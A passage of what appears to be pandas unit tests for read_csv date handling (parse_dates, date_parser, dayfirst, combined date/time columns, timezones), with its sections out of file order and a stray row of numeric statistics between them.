    """A strptime-based date_parser should match parse_dates=True output."""
    data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    parser = all_parsers

    def parse_yyyymmdd(value):
        # The dates in the fixture are compact YYYYMMDD strings.
        return datetime.strptime(value, "%Y%m%d")

    result = parser.read_csv(StringIO(data), date_parser=parse_yyyymmdd)
    expected = parser.read_csv(StringIO(data), parse_dates=True)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_implicit_first_col(all_parsers):
    """With parse_dates=True and no index_col, the first column is the
    implicitly parsed index — equivalent to passing index_col=0."""
    data = """A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    parser = all_parsers

    expected = parser.read_csv(StringIO(data), index_col=0, parse_dates=True)
    result = parser.read_csv(StringIO(data), parse_dates=True)
    tm.assert_frame_equal(result, expected)
def test_parse_dates_string(all_parsers):
    """parse_dates accepts a column name; that column doubles as the index."""
    data = """date,A,B,C
20090101,a,1,2
20090102,b,3,4
20090103,c,4,5
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), index_col="date",
                             parse_dates=["date"])

    expected_index = date_range("1/1/2009", periods=3, name="date")
    expected = DataFrame({"A": ["a", "b", "c"],
                          "B": [1, 3, 4],
                          "C": [2, 4, 5]}, index=expected_index)
    tm.assert_frame_equal(result, expected)
# Bug in https://github.com/dateutil/dateutil/issues/217
# has been addressed, but we just don't pass in the `yearfirst`
@pytest.mark.xfail(reason="yearfirst is not surfaced in read_*")
@pytest.mark.parametrize("parse_dates", [
    [["date", "time"]],
    [[0, 1]]
])
def test_yy_format_with_year_first(all_parsers, parse_dates):
    """Two-digit year/time columns combined with yearfirst semantics;
    expected to fail until read_csv surfaces a ``yearfirst`` option."""
    data = """date,time,B,C
090131,0010,1,2
090228,1020,3,4
090331,0830,5,6
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), index_col=0,
                             parse_dates=parse_dates)
    index = DatetimeIndex([datetime(2009, 1, 31, 0, 10, 0),
                           datetime(2009, 2, 28, 10, 20, 0),
                           datetime(2009, 3, 31, 8, 30, 0)],
                          dtype=object, name="date_time")
    expected = DataFrame({"B": [1, 3, 5], "C": [2, 4, 6]}, index=index)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("parse_dates", [[0, 2], ["a", "c"]])
def test_parse_dates_column_list(all_parsers, parse_dates):
    """Date columns can be selected by position or by name; dayfirst=True
    makes 15/02/2010 parse as February 15th."""
    parser = all_parsers
    data = "a,b,c\n01/01/2010,1,15/02/2010"

    expected = DataFrame({"a": [datetime(2010, 1, 1)],
                          "b": [1],
                          "c": [datetime(2010, 2, 15)]}).set_index(["a", "b"])

    result = parser.read_csv(StringIO(data), index_col=[0, 1],
                             parse_dates=parse_dates, dayfirst=True)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("index_col", [[0, 1], [1, 0]])
def test_multi_index_parse_dates(all_parsers, index_col):
    """parse_dates=True parses the date level of a two-level index, in
    either index-column order."""
    data = """index1,index2,A,B,C
20090101,one,a,1,2
20090101,two,b,3,4
20090101,three,c,4,5
20090102,one,a,1,2
20090102,two,b,3,4
20090102,three,c,4,5
20090103,one,a,1,2
20090103,two,b,3,4
20090103,three,c,4,5
"""
    parser = all_parsers
    index = MultiIndex.from_product([
        (datetime(2009, 1, 1), datetime(2009, 1, 2),
         datetime(2009, 1, 3)), ("one", "two", "three")],
        names=["index1", "index2"])
    # Out of order.
    if index_col == [1, 0]:
        index = index.swaplevel(0, 1)
    expected = DataFrame([["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5],
                          ["a", 1, 2], ["b", 3, 4], ["c", 4, 5]],
                         columns=["A", "B", "C"], index=index)
    result = parser.read_csv(StringIO(data), index_col=index_col,
                             parse_dates=True)
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [
    dict(dayfirst=True), dict(day_first=True)
])
def test_parse_dates_custom_euro_format(all_parsers, kwargs):
    """A dayfirst kwarg forwarded to ``parse_date`` parses European dates;
    the misspelled ``day_first`` kwarg surfaces as a TypeError."""
    parser = all_parsers
    data = """foo,bar,baz
31/01/2010,1,2
01/02/2010,1,NA
02/02/2010,1,2
"""
    if "dayfirst" in kwargs:
        df = parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                             date_parser=lambda d: parse_date(d, **kwargs),
                             header=0, index_col=0, parse_dates=True,
                             na_values=["NA"])
        exp_index = Index([datetime(2010, 1, 31), datetime(2010, 2, 1),
                           datetime(2010, 2, 2)], name="time")
        expected = DataFrame({"Q": [1, 1, 1], "NTU": [2, np.nan, 2]},
                             index=exp_index, columns=["Q", "NTU"])
        tm.assert_frame_equal(df, expected)
    else:
        msg = "got an unexpected keyword argument 'day_first'"
        with pytest.raises(TypeError, match=msg):
            parser.read_csv(StringIO(data), names=["time", "Q", "NTU"],
                            date_parser=lambda d: parse_date(d, **kwargs),
                            skiprows=[0], index_col=0, parse_dates=True,
                            na_values=["NA"])
def test_parse_tz_aware(all_parsers):
    """ISO-8601 timestamps with a Z suffix yield a UTC-aware index (gh-1693)."""
    parser = all_parsers
    data = "Date,x\n2012-06-13T01:39:00Z,0.5"

    result = parser.read_csv(StringIO(data), index_col=0, parse_dates=True)

    expected_index = Index([Timestamp("2012-06-13 01:39:00+00:00")],
                           name="Date")
    expected = DataFrame({"x": [0.5]}, index=expected_index)
    tm.assert_frame_equal(result, expected)
    assert result.index.tz is pytz.utc
@pytest.mark.parametrize("parse_dates,index_col", [
    ({"nominal": [1, 2]}, "nominal"),
    ({"nominal": [1, 2]}, 0),
    ([[1, 2]], 0),
])
def test_multiple_date_cols_index(all_parsers, parse_dates, index_col):
    """The combined date column can serve as the index, selected either by
    its new name or by position."""
    parser = all_parsers
    data = """
ID,date,NominalTime,ActualTime,TDew,TAir,Windspeed,Precip,WindDir
KORD1,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD2,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD3,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD4,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD5,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD6,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD1", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD2", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD3", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD4", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD5", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD6", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "ActualTime", "TDew",
                "TAir", "Windspeed", "Precip", "WindDir"])
    expected = expected.set_index("nominal")
    if not isinstance(parse_dates, dict):
        # List-form parse_dates auto-names the combined index column.
        expected.index.name = "date_NominalTime"
    result = parser.read_csv(StringIO(data), parse_dates=parse_dates,
                             index_col=index_col)
    tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_chunked(all_parsers):
    """Combined date parsing produces the same frame when reading in
    chunks of two rows."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), "KORD", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), "KORD", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), "KORD", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), "KORD", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), "KORD", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["nominal", "ID", "actualTime", "A", "B", "C", "D", "E"])
    expected = expected.set_index("nominal")
    reader = parser.read_csv(StringIO(data), parse_dates={"nominal": [1, 2]},
                             index_col="nominal", chunksize=2)
    chunks = list(reader)
    # Each chunk must line up with the corresponding slice of the full frame.
    tm.assert_frame_equal(chunks[0], expected[:2])
    tm.assert_frame_equal(chunks[1], expected[2:4])
    tm.assert_frame_equal(chunks[2], expected[4:])
def test_multiple_date_col_named_index_compat(all_parsers):
    """Positional ([1, 2]) and name-based (["date", "nominalTime"]) specs
    for the combined index column must produce identical frames."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    with_indices = parser.read_csv(StringIO(data),
                                   parse_dates={"nominal": [1, 2]},
                                   index_col="nominal")
    with_names = parser.read_csv(StringIO(data), index_col="nominal",
                                 parse_dates={"nominal": [
                                     "date", "nominalTime"]})
    tm.assert_frame_equal(with_indices, with_names)
def test_multiple_date_col_multiple_index_compat(all_parsers):
    """Using the combined date column inside a two-level index must match
    combining first and calling set_index afterwards."""
    parser = all_parsers
    data = """\
ID,date,nominalTime,actualTime,A,B,C,D,E
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    result = parser.read_csv(StringIO(data), index_col=["nominal", "ID"],
                             parse_dates={"nominal": [1, 2]})
    expected = parser.read_csv(StringIO(data),
                               parse_dates={"nominal": [1, 2]})
    expected = expected.set_index(["nominal", "ID"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("kwargs", [dict(), dict(index_col="C")])
def test_read_with_parse_dates_scalar_non_bool(all_parsers, kwargs):
    """A bare string for parse_dates must raise TypeError (gh-5636)."""
    parser = all_parsers
    data = """A,B,C
1,2,2003-11-1"""
    msg = ("Only booleans, lists, and dictionaries are accepted "
           "for the 'parse_dates' parameter")

    with pytest.raises(TypeError, match=msg):
        parser.read_csv(StringIO(data), parse_dates="C", **kwargs)
@pytest.mark.parametrize("parse_dates", [
    (1,), np.array([4, 5]), {1, 3, 3}
])
def test_read_with_parse_dates_invalid_type(all_parsers, parse_dates):
    """Tuples, ndarrays, and sets for parse_dates must raise TypeError.

    Previously the parametrized value was ignored and ``(1,)`` was
    hard-coded in the read_csv call, so the ndarray and set cases were
    never actually exercised.
    """
    parser = all_parsers
    msg = ("Only booleans, lists, and dictionaries "
           "are accepted for the 'parse_dates' parameter")
    data = """A,B,C
1,2,2003-11-1"""
    with pytest.raises(TypeError, match=msg):
        # Use the parametrized value so every invalid type is tested.
        parser.read_csv(StringIO(data), parse_dates=parse_dates)
def test_parse_dates_empty_string(all_parsers):
    """An empty field in a parsed date column becomes NaT even with
    na_filter=False (gh-2263)."""
    parser = all_parsers
    data = "Date,test\n2012-01-01,1\n,2"

    result = parser.read_csv(StringIO(data), parse_dates=["Date"],
                             na_filter=False)

    rows = [[datetime(2012, 1, 1), 1],
            [pd.NaT, 2]]
    expected = DataFrame(rows, columns=["Date", "test"])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
    ("a\n04.15.2016", dict(parse_dates=["a"]),
     DataFrame([datetime(2016, 4, 15)], columns=["a"])),
    ("a\n04.15.2016", dict(parse_dates=True, index_col=0),
     DataFrame(index=DatetimeIndex(["2016-04-15"], name="a"))),
    ("a,b\n04.15.2016,09.16.2013", dict(parse_dates=["a", "b"]),
     DataFrame([[datetime(2016, 4, 15), datetime(2013, 9, 16)]],
               columns=["a", "b"])),
    ("a,b\n04.15.2016,09.16.2013", dict(parse_dates=True, index_col=[0, 1]),
     DataFrame(index=MultiIndex.from_tuples(
         [(datetime(2016, 4, 15), datetime(2013, 9, 16))], names=["a", "b"]))),
])
def test_parse_dates_no_convert_thousands(all_parsers, data, kwargs, expected):
    """Date strings containing "." must not be mangled when the thousands
    separator is also "." (gh-14066)."""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), thousands=".", **kwargs)
    tm.assert_frame_equal(result, expected)
def test_parse_date_time_multi_level_column_name(all_parsers):
    """Combining date/time columns works with a two-level header; the new
    column gets a flat name while others keep their tuples."""
    data = """\
D,T,A,B
date, time,a,b
2001-01-05, 09:00:00, 0.0, 10.
2001-01-06, 00:00:00, 1.0, 11.
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=[0, 1],
                             parse_dates={"date_time": [0, 1]},
                             date_parser=conv.parse_date_time)
    expected_data = [[datetime(2001, 1, 5, 9, 0, 0), 0., 10.],
                     [datetime(2001, 1, 6, 0, 0, 0), 1., 11.]]
    expected = DataFrame(expected_data,
                         columns=["date_time", ("A", "a"), ("B", "b")])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,kwargs,expected", [
    ("""\
date,time,a,b
2001-01-05, 10:00:00, 0.0, 10.
2001-01-05, 00:00:00, 1., 11.
""", dict(header=0, parse_dates={"date_time": [0, 1]}),
     DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10],
                [datetime(2001, 1, 5, 0, 0, 0), 1.0, 11.0]],
               columns=["date_time", "a", "b"])),
    (("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
      "KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
      "KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
      "KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
      "KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
      "KORD,19990127, 23:00:00, 22:56:00, -0.5900"),
     dict(header=None, parse_dates={"actual": [1, 2], "nominal": [1, 3]}),
     DataFrame([
         [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
          "KORD", 0.81],
         [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
          "KORD", 0.01],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
          "KORD", -0.99],
         [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
          "KORD", -0.59],
         [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
          "KORD", -0.59]], columns=["actual", "nominal", 0, 4])),
])
def test_parse_date_time(all_parsers, data, kwargs, expected):
    """``conv.parse_date_time`` combines date/time columns for single- and
    multi-target parse_dates specs alike."""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), date_parser=conv.parse_date_time,
                             **kwargs)
    # Python can sometimes be flaky about how
    # the aggregated columns are entered, so
    # this standardizes the order.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
def test_parse_date_fields(all_parsers):
    """Separate year/month/day columns combine into a single "ymd" date
    column via ``conv.parse_date_fields``."""
    parser = all_parsers
    data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."

    result = parser.read_csv(StringIO(data), header=0,
                             parse_dates={"ymd": [0, 1, 2]},
                             date_parser=conv.parse_date_fields)

    rows = [(datetime(2001, 1, 10), 10.0),
            (datetime(2001, 2, 1), 11.0)]
    expected = DataFrame(rows, columns=["ymd", "a"])
    tm.assert_frame_equal(result, expected)
def test_parse_date_all_fields(all_parsers):
    """Six year..second columns combine into one "ymdHMS" datetime column
    via ``conv.parse_all_fields``."""
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0,0.0,10.
2001,01,5,10,0,00,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_datetime_fractional_seconds(all_parsers):
    """Fractional values in the seconds column become microseconds in the
    combined "ymdHMS" datetime column."""
    parser = all_parsers
    data = """\
year,month,day,hour,minute,second,a,b
2001,01,05,10,00,0.123456,0.0,10.
2001,01,5,10,0,0.500000,1.,11.
"""
    result = parser.read_csv(StringIO(data), header=0,
                             date_parser=conv.parse_all_fields,
                             parse_dates={"ymdHMS": [0, 1, 2, 3, 4, 5]})
    expected = DataFrame([[datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=123456), 0.0, 10.0],
                          [datetime(2001, 1, 5, 10, 0, 0,
                                    microsecond=500000), 1.0, 11.0]],
                         columns=["ymdHMS", "a", "b"])
    tm.assert_frame_equal(result, expected)
def test_generic(all_parsers):
    """A user-supplied date_parser may combine only some columns (year and
    month here); the untouched day column survives on its own."""
    parser = all_parsers
    data = "year,month,day,a\n2001,01,10,10.\n2001,02,1,11."

    def first_of_month(y, m):
        # Collapse year/month pairs onto the first day of that month.
        return date(year=int(y), month=int(m), day=1)

    result = parser.read_csv(StringIO(data), header=0,
                             parse_dates={"ym": [0, 1]},
                             date_parser=first_of_month)

    expected = DataFrame([[date(2001, 1, 1), 10, 10.0],
                          [date(2001, 2, 1), 1, 11.0]],
                         columns=["ym", "day", "a"])
    tm.assert_frame_equal(result, expected)
def test_date_parser_resolution_if_not_ns(all_parsers):
    """A date_parser producing datetime64[s] values keeps that resolution
    in the resulting MultiIndex (gh-10245)."""
    parser = all_parsers
    data = """\
date,time,prn,rxstatus
2013-11-03,19:00:00,126,00E80000
2013-11-03,19:00:00,23,00E80000
2013-11-03,19:00:00,13,00E80000
"""
    def date_parser(dt, time):
        # Join date and time strings into second-resolution datetime64.
        return np_array_datetime64_compat(dt + "T" + time + "Z",
                                          dtype="datetime64[s]")
    result = parser.read_csv(StringIO(data), date_parser=date_parser,
                             parse_dates={"datetime": ["date", "time"]},
                             index_col=["datetime", "prn"])
    datetimes = np_array_datetime64_compat(["2013-11-03T19:00:00Z"] * 3,
                                           dtype="datetime64[s]")
    expected = DataFrame(data={"rxstatus": ["00E80000"] * 3},
                         index=MultiIndex.from_tuples(
                             [(datetimes[0], 126), (datetimes[1], 23),
                              (datetimes[2], 13)], names=["datetime", "prn"]))
    tm.assert_frame_equal(result, expected)
def test_parse_date_column_with_empty_string(all_parsers):
    """A blank entry in the date column leaves the whole column as the
    original strings rather than raising (gh-6428)."""
    parser = all_parsers
    data = "case,opdate\n7,10/18/2006\n7,10/18/2008\n621, "

    result = parser.read_csv(StringIO(data), parse_dates=["opdate"])

    expected = DataFrame({"case": [7, 7, 621],
                          "opdate": ["10/18/2006", "10/18/2008", " "]})
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("data,expected", [
    ("a\n135217135789158401\n1352171357E+5",
     DataFrame({"a": [135217135789158401,
                      135217135700000]}, dtype="float64")),
    ("a\n99999999999\n123456789012345\n1234E+0",
     DataFrame({"a": [99999999999,
                      123456789012345,
                      1234]}, dtype="float64"))
])
@pytest.mark.parametrize("parse_dates", [True, False])
def test_parse_date_float(all_parsers, data, expected, parse_dates):
    """Large / scientific-notation numerics stay float64 whether or not
    date parsing is attempted (gh-2697)."""
    # Date parsing should fail, so we leave the data untouched
    # (i.e. float precision should remain unchanged).
    parser = all_parsers
    result = parser.read_csv(StringIO(data), parse_dates=parse_dates)
    tm.assert_frame_equal(result, expected)
def test_parse_timezone(all_parsers):
    """Fixed-offset (+09:00) timestamps parse into a tz-aware datetime
    column (gh-22256)."""
    parser = all_parsers
    data = """dt,val
2018-01-04 09:01:00+09:00,23350
2018-01-04 09:02:00+09:00,23400
2018-01-04 09:03:00+09:00,23400
2018-01-04 09:04:00+09:00,23400
2018-01-04 09:05:00+09:00,23400"""

    result = parser.read_csv(StringIO(data), parse_dates=["dt"])

    # +09:00 corresponds to a fixed offset of 540 minutes.
    offset = pytz.FixedOffset(540)
    dti = pd.date_range(start="2018-01-04 09:01:00",
                        end="2018-01-04 09:05:00",
                        freq="1min", tz=offset)
    expected = DataFrame({"dt": dti,
                          "val": [23350, 23400, 23400, 23400, 23400]})
    tm.assert_frame_equal(result, expected)
| 40.189189 | 79 | 0.570597 |
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
    """A thousands separator of "-" must not interfere with parsing dates
    that also contain "-"."""
    parser = all_parsers
    data = "06-02-2013;13:00;1-000.215"

    result = parser.read_csv(StringIO(data), sep=";", thousands="-",
                             parse_dates={"Date": [0, 1]}, header=None)

    expected = DataFrame([[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
                         columns=["Date", 2])
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
    """Combine column pairs via a user-supplied date_parser built on
    ``parsing.try_parse_dates`` / ``parsers._concat_date_cols``."""
    data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    parser = all_parsers
    def date_parser(*date_cols):
        """Concatenate the given date columns and try to parse them."""
        return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))
    result = parser.read_csv(StringIO(data), header=None,
                             date_parser=date_parser, prefix="X",
                             parse_dates={"actual": [1, 2],
                                          "nominal": [1, 3]},
                             keep_date_col=keep_date_col)
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", "19990127", " 19:00:00", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", "19990127", " 20:00:00", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", "19990127", " 21:00:00", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", "19990127", " 21:00:00", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", "19990127", " 22:00:00", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", "19990127", " 23:00:00", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["actual", "nominal", "X0", "X1", "X2",
                "X3", "X4", "X5", "X6", "X7", "X8"])
    if not keep_date_col:
        # The consumed date-part columns are dropped after combining.
        expected = expected.drop(["X1", "X2", "X3"], axis=1)
    elif parser.engine == "python":
        # The expected cast mirrors the python engine reading X1 as ints.
        expected["X1"] = expected["X1"].astype(np.int64)
    # Normalize column order before comparing.
    result = result[expected.columns]
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
    """Combine column pairs [1, 2] and [1, 3] into parsed date columns
    named X1_X2 / X1_X3, optionally keeping the original columns."""
    data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None,
                             prefix="X", parse_dates=[[1, 2], [1, 3]],
                             keep_date_col=keep_date_col)
    expected = DataFrame([
        [datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
         "KORD", "19990127", " 19:00:00", " 18:56:00",
         0.81, 2.81, 7.2, 0.0, 280.0],
        [datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
         "KORD", "19990127", " 20:00:00", " 19:56:00",
         0.01, 2.21, 7.2, 0.0, 260.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
         "KORD", "19990127", " 21:00:00", " 20:56:00",
         -0.59, 2.21, 5.7, 0.0, 280.0],
        [datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
         "KORD", "19990127", " 21:00:00", " 21:18:00",
         -0.99, 2.01, 3.6, 0.0, 270.0],
        [datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
         "KORD", "19990127", " 22:00:00", " 21:56:00",
         -0.59, 1.71, 5.1, 0.0, 290.0],
        [datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
         "KORD", "19990127", " 23:00:00", " 22:56:00",
         -0.59, 1.71, 4.6, 0.0, 280.0],
    ], columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
                "X3", "X4", "X5", "X6", "X7", "X8"])
    if not keep_date_col:
        # The consumed date-part columns are dropped after combining.
        expected = expected.drop(["X1", "X2", "X3"], axis=1)
    elif parser.engine == "python":
        # The expected cast mirrors the python engine reading X1 as ints.
        expected["X1"] = expected["X1"].astype(np.int64)
    tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
    """Parse column 1 as dates while simultaneously using it as the index."""
    data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
    parser = all_parsers
    result = parser.read_csv(StringIO(data), header=None, prefix="X",
                             parse_dates=[1], index_col=1)
    # Duplicate 21:00 rows are preserved as duplicate index entries.
    index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
                   datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
                   datetime(1999, 1, 27, 22, 0)], name="X1")
    expected = DataFrame([
